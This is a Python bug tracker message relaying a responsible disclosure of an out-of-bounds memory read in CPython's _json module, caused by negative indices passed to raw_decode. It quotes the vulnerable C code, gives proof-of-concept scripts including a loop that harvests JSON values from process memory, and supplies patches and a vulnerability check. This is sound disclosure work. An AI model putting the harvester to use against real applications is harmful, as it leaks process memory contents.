Message 218771 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	benjamin.peterson
Recipients	benjamin.peterson
Date	2014-05-19.00:40:48
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1400460059.59.0.206542140717.issue21529@psf.upfronthosting.co.za>
In-reply-to

Content
(Copy paste from the security list) Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index. The bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory. Let me clarify: This is Python-3.4.0/Modules/_json.c: 1035 static PyObject * 1036 scanner_call(PyObject self, PyObject args, PyObject kwds) 1037 { 1038 / Python callable interface to scan_once_{str,unicode} / 1039 PyObject pystr; 1040 PyObject rval; 1041 Py_ssize_t idx; 1042 Py_ssize_t next_idx = -1; 1043 static char kwlist[] = {"string", "idx", NULL}; 1044 PyScannerObject s; 1045 assert(PyScanner_Check(self)); 1046 s = (PyScannerObject )self; 1047 if (!PyArg_ParseTupleAndKeywords(args, kwds, "On:scan_once", kwlist, &pystr, &idx)) 1048 return NULL; 1049 1050 if (PyUnicode_Check(pystr)) { 1051 rval = scan_once_unicode(s, pystr, idx, &next_idx); 1052 } 1053 else { 1054 PyErr_Format(PyExc_TypeError, 1055 "first argument must be a string, not %.80s", 1056 Py_TYPE(pystr)->tp_name); 1057 return NULL; 1058 } 1059 PyDict_Clear(s->memo); 1060 if (rval == NULL) 1061 return NULL; 1062 return _build_rval_index_tuple(rval, next_idx); 1063 } As you can see on line 1047, ParseTuple takes an 'n' as an argument for 'end', which, as can be learned from this page ( https://docs.python.org/3/c-api/arg.html ), means: n (int) [Py_ssize_t] Convert a Python integer to a C Py_ssize_t. This means it accepts a SIGNED integer value, thus allowing a negative value to be supplied as the 'end' parameter. Then onto scanstring_unicode_once to which execution gets transferred through line 1051 of the code above. 922 static PyObject * 923 scan_once_unicode(PyScannerObject s, PyObject pystr, Py_ssize_t idx, Py_ssize_t next_idx_ptr) 924 { 925 / Read one JSON term (of any kind) from PyUnicode pystr. 926 idx is the index of the first character of the term 927 next_idx_ptr is a return-by-reference index to the first character after 928 the number. 929 930 Returns a new PyObject representation of the term. 931 / 932 PyObject res; 933 void str; 934 int kind; 935 Py_ssize_t length; 936 937 if (PyUnicode_READY(pystr) == -1) 938 return NULL; 939 940 str = PyUnicode_DATA(pystr); 941 kind = PyUnicode_KIND(pystr); 942 length = PyUnicode_GET_LENGTH(pystr); 943 944 if (idx >= length) { 945 raise_stop_iteration(idx); 946 return NULL; 947 } Here we see that 'length' is set to the length of the string parameter. This will always be a positive value. On line 945 it is checked whether idx is equal or higher than length; this can never be true in the case of a negative index value. 949 switch (PyUnicode_READ(kind, str, idx)) { PyUnicode_READ is defined as follows ( in Python-3.4.0/Include/unicodeobject.h ): 516 /* Read a code point from the string's canonical representation. No checks 517 or ready calls are performed. / 518 #define PyUnicode_READ(kind, data, index) \ 519 ((Py_UCS4) \ 520 ((kind) == PyUnicode_1BYTE_KIND ? \ 521 ((const Py_UCS1 )(data))[(index)] : \ 522 ((kind) == PyUnicode_2BYTE_KIND ? \ 523 ((const Py_UCS2 )(data))[(index)] : \ 524 ((const Py_UCS4 )(data))[(index)] \ 525 ) \ 526 )) Here we can see that index, which is negative in our example, is used as an array index. Since it is negative, it will internally wrap around and point to an address BELOW the address of 'data'. So, if a certain negative value (such as -0x7FFFFFFF) is supplied and data[index] will effectively point to an invalid or read-protected page in memory, the Python executable will segfault. But there's more. Instead of making it point to an invalid page, let's make it point to something valid: 1 from json import JSONDecoder 2 j = JSONDecoder() 3 a = "99448866" 4 b = "88445522" 5 diff = id(a) - id(b) 6 print("Difference is " + hex(diff)) 7 print j.raw_decode(b) 8 print j.raw_decode(b, diff) Output of this script is: Difference is -0x30 (88445522, 8) (99448866, -40) The difference between the address of 'a' and the address of 'b' is calculated and supplied as an index to the raw_decode function. Internally the address wraps around and we get to see the contents of 'a' while having supplied 'b' as a parameter. We can use this harvester to scan memory for valid JSON strings: 1 from json import JSONDecoder 2 j = JSONDecoder() 3 a = "x" * 1000 4 for x in range(0, 600000): 5 try: 6 print j.raw_decode(a, 0 - x) 7 except: 8 pass There is one drawback, however. We cannot decode strings in this manner because: 296 static PyObject * 297 scanstring_unicode(PyObject pystr, Py_ssize_t end, int strict, Py_ssize_t next_end_ptr) 298 { 299 /* Read the JSON string from PyUnicode pystr. 300 end is the index of the first character after the quote. 301 if strict is zero then literal control characters are allowed 302 next_end_ptr is a return-by-reference index of the character 303 after the end quote 304 305 Return value is a new PyUnicode 306 / 307 PyObject rval = NULL; 308 Py_ssize_t len; 309 Py_ssize_t begin = end - 1; 310 Py_ssize_t next / = begin /; 311 const void buf; 312 int kind; 313 PyObject chunks = NULL; 314 PyObject chunk = NULL; 315 316 if (PyUnicode_READY(pystr) == -1) 317 return 0; 318 319 len = PyUnicode_GET_LENGTH(pystr); 320 buf = PyUnicode_DATA(pystr); 321 kind = PyUnicode_KIND(pystr); 322 323 if (end < 0 \|\| len < end) { 324 PyErr_SetString(PyExc_ValueError, "end is out of bounds"); 325 goto bail; this code actually performs a bounds check by asserting that end (which is our index) isn't negative. However, I succesfully ran harvesting tests that could extract JSON-encoded arrays of numerical values (such as [10, 20, 40, 70] ) from the process memory without any problem or difficulty. Given the ubiquity of JSON parsing in Python applications and the limited amount of prequisites and conditions under which this bug can be exploited, it is evident that this issue could have serious security implications in some cases. Here is a patch for 3.4.0: --- _json_old.c 2014-04-12 17:47:08.749012372 +0200 +++ _json.c 2014-04-12 17:44:52.253011645 +0200 @@ -941,7 +941,7 @@ kind = PyUnicode_KIND(pystr); length = PyUnicode_GET_LENGTH(pystr); - if (idx >= length) { + if ( idx < 0 \|\| idx >= length) { raise_stop_iteration(idx); return NULL; } And here is a patch for 2.7.6: --- _json_old.c 2014-04-12 17:57:14.365015601 +0200 +++ _json.c 2014-04-12 18:04:25.149017898 +0200 @@ -1491,7 +1491,7 @@ PyObject res; char str = PyString_AS_STRING(pystr); Py_ssize_t length = PyString_GET_SIZE(pystr); - if (idx >= length) { + if ( idx < 0 \|\| idx >= length) { PyErr_SetNone(PyExc_StopIteration); return NULL; } @@ -1578,7 +1578,7 @@ PyObject res; Py_UNICODE str = PyUnicode_AS_UNICODE(pystr); Py_ssize_t length = PyUnicode_GET_SIZE(pystr); - if (idx >= length) { + if ( idx < 0 \|\| idx >= length) { PyErr_SetNone(PyExc_StopIteration); return NULL; } Here is a script that checks whether the Python binary that executes it is vulnerable: 1 from json import JSONDecoder 2 j = JSONDecoder() 3 4 a = '128931233' 5 b = "472389423" 6 7 if id(a) < id(b): 8 x = a 9 y = b 10 else: 11 x = b 12 y = a 13 14 diff = id(x) - id(y) 15 16 try: 17 j.raw_decode(y, diff) 18 print("Vulnerable") 19 except: 20 print("Not vulnerable") Please let me know what your thoughts on this are and when you think it will be fixed. Thank you. Note: I haven't shared this vulnerability with anyone and I won't do so until the bug has been fixed. Guido Vranken

(Copy paste from the security list)

Python 2 and 3 are susceptible to arbitrary process memory reading by
a user or adversary due to a bug in the _json module caused by
insufficient bounds checking.

The sole prerequisites of this attack are that the attacker is able to
control or influence the two parameters of the default scanstring
function: the string to be decoded and the index.

The bug is caused by allowing the user to supply a negative index
value. The index value is then used directly as an index to an array
in the C code; internally the address of the array and its index are
added to each other in order to yield the address of the value that is
desired. However, by supplying a negative index value and adding this
to the address of the array, the processor's register value wraps
around and the calculated value will point to a position in memory
which isn't within the bounds of the supplied string, causing the
function to access other parts of the process memory.

Let me clarify:

This is Python-3.4.0/Modules/_json.c:

1035 static PyObject *
1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)
1037 {
1038     /* Python callable interface to scan_once_{str,unicode} */
1039     PyObject *pystr;
1040     PyObject *rval;
1041     Py_ssize_t idx;
1042     Py_ssize_t next_idx = -1;
1043     static char *kwlist[] = {"string", "idx", NULL};
1044     PyScannerObject *s;
1045     assert(PyScanner_Check(self));
1046     s = (PyScannerObject *)self;
1047     if (!PyArg_ParseTupleAndKeywords(args, kwds, "On:scan_once",
kwlist, &pystr, &idx))
1048         return NULL;
1049
1050     if (PyUnicode_Check(pystr)) {
1051         rval = scan_once_unicode(s, pystr, idx, &next_idx);
1052     }
1053     else {
1054         PyErr_Format(PyExc_TypeError,
1055                  "first argument must be a string, not %.80s",
1056                  Py_TYPE(pystr)->tp_name);
1057         return NULL;
1058     }
1059     PyDict_Clear(s->memo);
1060     if (rval == NULL)
1061         return NULL;
1062     return _build_rval_index_tuple(rval, next_idx);
1063 }

As you can see on line 1047, ParseTuple takes an 'n' as an argument
for 'end', which, as can be learned from this page (
https://docs.python.org/3/c-api/arg.html ), means:

        n (int) [Py_ssize_t]
            Convert a Python integer to a C Py_ssize_t.

This means it accepts a SIGNED integer value, thus allowing a negative
value to be supplied as the 'end' parameter.

Then onto scanstring_unicode_once to which execution gets transferred
through line 1051 of the code above.

922  static PyObject *
923  scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_t
idx, Py_ssize_t *next_idx_ptr)
924  {
925      /* Read one JSON term (of any kind) from PyUnicode pystr.
926      idx is the index of the first character of the term
927      *next_idx_ptr is a return-by-reference index to the first
character after
928          the number.
929
930      Returns a new PyObject representation of the term.
931      */
932      PyObject *res;
933      void *str;
934      int kind;
935      Py_ssize_t length;
936
937      if (PyUnicode_READY(pystr) == -1)
938          return NULL;
939
940      str = PyUnicode_DATA(pystr);
941      kind = PyUnicode_KIND(pystr);
942      length = PyUnicode_GET_LENGTH(pystr);
943
944      if (idx >= length) {
945          raise_stop_iteration(idx);
946          return NULL;
947      }

Here we see that 'length' is set to the length of the string
parameter. This will always be a positive value. On line 945 it is
checked whether idx is equal or higher than length; this can never be
true in the case of a negative index value.

949      switch (PyUnicode_READ(kind, str, idx)) {

PyUnicode_READ is defined as follows ( in
Python-3.4.0/Include/unicodeobject.h ):

516  /* Read a code point from the string's canonical representation.  No checks
517     or ready calls are performed. */
518  #define PyUnicode_READ(kind, data, index) \
519      ((Py_UCS4) \
520      ((kind) == PyUnicode_1BYTE_KIND ? \
521          ((const Py_UCS1 *)(data))[(index)] : \
522          ((kind) == PyUnicode_2BYTE_KIND ? \
523              ((const Py_UCS2 *)(data))[(index)] : \
524              ((const Py_UCS4 *)(data))[(index)] \
525          ) \
526      ))

Here we can see that index, which is negative in our example, is used
as an array index. Since it is negative, it will internally wrap
around and point to an address BELOW the address of 'data'.

So, if a certain negative value (such as -0x7FFFFFFF) is supplied and
data[index] will effectively point to an invalid or read-protected
page in memory, the Python executable will segfault.

But there's more. Instead of making it point to an invalid page, let's
make it point to something valid:

1    from json import JSONDecoder
2    j = JSONDecoder()
3    a = "99448866"
4    b = "88445522"
5    diff = id(a) - id(b)
6    print("Difference is " + hex(diff))
7    print j.raw_decode(b)
8    print j.raw_decode(b, diff)

Output of this script is:

Difference is -0x30
(88445522, 8)
(99448866, -40)

The difference between the address of 'a' and the address of 'b' is
calculated and supplied as an index to the raw_decode function.
Internally the address wraps around and we get to see the contents of
'a' while having supplied 'b' as a parameter.

We can use this harvester to scan memory for valid JSON strings:

1    from json import JSONDecoder
2    j = JSONDecoder()
3    a = "x" * 1000
4    for x in range(0, 600000):
5        try:
6            print j.raw_decode(a, 0 - x)
7        except:
8            pass

There is one drawback, however. We cannot decode strings in this manner because:

296  static PyObject *
297  scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict,
Py_ssize_t *next_end_ptr)
298  {
299      /* Read the JSON string from PyUnicode pystr.
300      end is the index of the first character after the quote.
301      if strict is zero then literal control characters are allowed
302      *next_end_ptr is a return-by-reference index of the character
303          after the end quote
304
305      Return value is a new PyUnicode
306      */
307      PyObject *rval = NULL;
308      Py_ssize_t len;
309      Py_ssize_t begin = end - 1;
310      Py_ssize_t next /* = begin */;
311      const void *buf;
312      int kind;
313      PyObject *chunks = NULL;
314      PyObject *chunk = NULL;
315
316      if (PyUnicode_READY(pystr) == -1)
317          return 0;
318
319      len = PyUnicode_GET_LENGTH(pystr);
320      buf = PyUnicode_DATA(pystr);
321      kind = PyUnicode_KIND(pystr);
322
323      if (end < 0 || len < end) {
324          PyErr_SetString(PyExc_ValueError, "end is out of bounds");
325          goto bail;

this code actually performs a bounds check by asserting that end
(which is our index) isn't negative.

However, I succesfully ran harvesting tests that could extract
JSON-encoded arrays of numerical values (such as [10, 20, 40, 70] )
from the process memory without any problem or difficulty.

Given the ubiquity of JSON parsing in Python applications and the
limited amount of prequisites and conditions under which this bug can
be exploited, it is evident that this issue could have serious
security implications in some cases.

Here is a patch for 3.4.0:

--- _json_old.c    2014-04-12 17:47:08.749012372 +0200
+++ _json.c    2014-04-12 17:44:52.253011645 +0200
@@ -941,7 +941,7 @@
     kind = PyUnicode_KIND(pystr);
     length = PyUnicode_GET_LENGTH(pystr);

-    if (idx >= length) {
+    if ( idx < 0 || idx >= length) {
         raise_stop_iteration(idx);
         return NULL;
     }

And here is a patch for 2.7.6:

--- _json_old.c    2014-04-12 17:57:14.365015601 +0200
+++ _json.c    2014-04-12 18:04:25.149017898 +0200
@@ -1491,7 +1491,7 @@
     PyObject *res;
     char *str = PyString_AS_STRING(pystr);
     Py_ssize_t length = PyString_GET_SIZE(pystr);
-    if (idx >= length) {
+    if ( idx < 0 || idx >= length) {
         PyErr_SetNone(PyExc_StopIteration);
         return NULL;
     }
@@ -1578,7 +1578,7 @@
     PyObject *res;
     Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);
     Py_ssize_t length = PyUnicode_GET_SIZE(pystr);
-    if (idx >= length) {
+    if ( idx < 0 || idx >= length) {
         PyErr_SetNone(PyExc_StopIteration);
         return NULL;
     }


Here is a script that checks whether the Python binary that executes
it is vulnerable:

1    from json import JSONDecoder
2    j = JSONDecoder()
3
4    a = '128931233'
5    b = "472389423"
6
7    if id(a) < id(b):
8        x = a
9        y = b
10   else:
11       x = b
12       y = a
13
14   diff = id(x) - id(y)
15
16   try:
17       j.raw_decode(y, diff)
18       print("Vulnerable")
19   except:
20       print("Not vulnerable")


Please let me know what your thoughts on this are and when you think
it will be fixed. Thank you.

Note: I haven't shared this vulnerability with anyone and I won't do
so until the bug has been fixed.

Guido Vranken

History
Date	User	Action	Args
2014-05-19 00:41:00	benjamin.peterson	set	recipients: + benjamin.peterson
2014-05-19 00:40:59	benjamin.peterson	set	messageid: <1400460059.59.0.206542140717.issue21529@psf.upfronthosting.co.za>
2014-05-19 00:40:59	benjamin.peterson	link	issue21529 messages
2014-05-19 00:40:49	benjamin.peterson	create